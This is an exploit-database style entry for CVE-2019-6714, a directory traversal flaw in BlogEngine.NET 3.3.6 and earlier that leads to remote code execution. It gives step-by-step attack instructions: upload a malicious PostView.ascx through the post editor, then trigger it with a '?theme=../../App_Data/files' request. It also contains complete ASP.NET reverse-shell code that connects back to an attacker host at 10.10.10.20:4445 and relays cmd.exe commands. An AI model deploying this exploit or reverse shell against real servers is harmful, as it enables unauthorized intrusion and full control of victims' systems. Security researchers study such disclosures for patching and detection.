BlogEngine.NET 3.3.6 Directory Traversal / Remote Code Execution

`# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE  
# Date: 02-11-2019  
# Exploit Author: Dustin Cobb  
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/  
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip  
# Version: <= 3.3.6  
# Tested on: Windows 2016 Standard / IIS 10.0  
# CVE : CVE-2019-6714  
  
/*  
* CVE-2019-6714  
*  
* Path traversal vulnerability leading to remote code execution. This   
* vulnerability affects BlogEngine.NET versions 3.3.6 and below. This   
* is caused by an unchecked "theme" parameter that is used to override  
* the default theme for rendering blog pages. The vulnerable code can   
* be seen in this file:  
*   
* /Custom/Controls/PostList.ascx.cs  
*  
* Attack:  
*  
* First, we set the TcpClient address and port within the method below to   
* our attack host, who has a reverse tcp listener waiting for a connection.  
* Next, we upload this file through the file manager. In the current (3.3.6)  
* version of BlogEngine, this is done by editing a post and clicking on the   
* icon that looks like an open file in the toolbar. Note that this file must  
* be uploaded as PostView.ascx. Once uploaded, the file will be in the  
* /App_Data/files directory off of the document root. The admin page that  
* allows upload is:  
*  
* http://10.10.10.10/admin/app/editor/editpost.cshtml  
*  
*  
* Finally, the vulnerability is triggered by accessing the base URL for the   
* blog with a theme override specified like so:  
*  
* http://10.10.10.10/?theme=../../App_Data/files  
*  
*/  
  
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>  
<%@ Import Namespace="BlogEngine.Core" %>  
  
<script runat="server">  
static System.IO.StreamWriter streamWriter;  
  
protected override void OnLoad(EventArgs e) {  
base.OnLoad(e);  
  
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {  
using(System.IO.Stream stream = client.GetStream()) {  
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {  
streamWriter = new System.IO.StreamWriter(stream);  
  
StringBuilder strInput = new StringBuilder();  
  
System.Diagnostics.Process p = new System.Diagnostics.Process();  
p.StartInfo.FileName = "cmd.exe";  
p.StartInfo.CreateNoWindow = true;  
p.StartInfo.UseShellExecute = false;  
p.StartInfo.RedirectStandardOutput = true;  
p.StartInfo.RedirectStandardInput = true;  
p.StartInfo.RedirectStandardError = true;  
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);  
p.Start();  
p.BeginOutputReadLine();  
  
while(true) {  
strInput.Append(rdr.ReadLine());  
p.StandardInput.WriteLine(strInput);  
strInput.Remove(0, strInput.Length);  
}  
}  
}  
}  
}  
  
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {  
StringBuilder strOutput = new StringBuilder();  
  
if (!String.IsNullOrEmpty(outLine.Data)) {  
try {  
strOutput.Append(outLine.Data);  
streamWriter.WriteLine(strOutput);  
streamWriter.Flush();  
} catch (Exception err) { }  
}  
}  
  
</script>  
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>  
`